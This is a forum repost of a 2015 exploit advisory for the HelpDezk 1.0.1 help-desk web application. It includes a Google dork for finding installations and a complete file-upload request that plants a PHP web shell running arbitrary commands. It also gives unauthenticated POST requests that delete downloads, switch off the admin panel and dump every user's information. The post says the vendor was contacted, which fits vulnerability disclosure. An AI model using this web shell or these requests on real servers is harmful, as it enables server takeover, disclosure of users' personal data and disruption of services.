Aerosol Posted February 28, 2015 Report Posted February 28, 2015 # Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities# Google Dork: "intext: helpdezk-community-1.0.1"# Date: 26-2-2015# Exploit Author: Dennis Veninga# Vendor Homepage: http://www.helpdezk.org/# Vendor contacted: 26-2-2015# Version: 1.0.1# Tested on: Firefox 36 & Chrome 38 / W8.1-x64HelpDezk ->Version: 1.0.1Type: Multiple Critical VulnerabilitiesSeverity: CriticalInfo Exploit: Different exploits making it possible to take over the website/server- Arbitrary File Upload- Remote Command Execution- User Information Disclosure###############################################Arbitrary File Upload, 2 ways ->1. Direct Access:http://{target}/helpdezk/admin/logos/upload#########2. POST: http://localhost/helpdezk/admin/logos/uploadAfter posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoamiCONTENT: -----------------------------14463264629720\r\nContent-Disposition: form-data; name="file"; filename="shell.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\nif(isset($_REQUEST['cmd'])){\r\n$cmd = ($_REQUEST["cmd"]);\r\nsystem($cmd);\r\necho "</pre>$cmd<pre>";\r\ndie;\r\n}\r\n?>\r\n-----------------------------14463264629720--\r\n###############################################Remote Command Execution, you see an white page with 'ok' when SUCCESS!Delete a downloadPOST: http://localhost/helpdezk/admin/downloads/deleteCONTENT: id={IDNUMBER} Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again*POST: http://{localhost}/helpdezk/admin/modules/deactivateCONTENT: id=1id=1 = Adminid=2 = Dashboardid=3 = HelpDezk###############################################User Information DisclosureNOTE: Stop javascript, else it will quickly show all info and returns you to the login page.POST: http://{target}/helpdezk/admin/relPessoa/table_json/CONTENT: typeperson=ALL###############################################I'm sure I didn't find everything, but maybe time to fix those huge issues first!Source Quote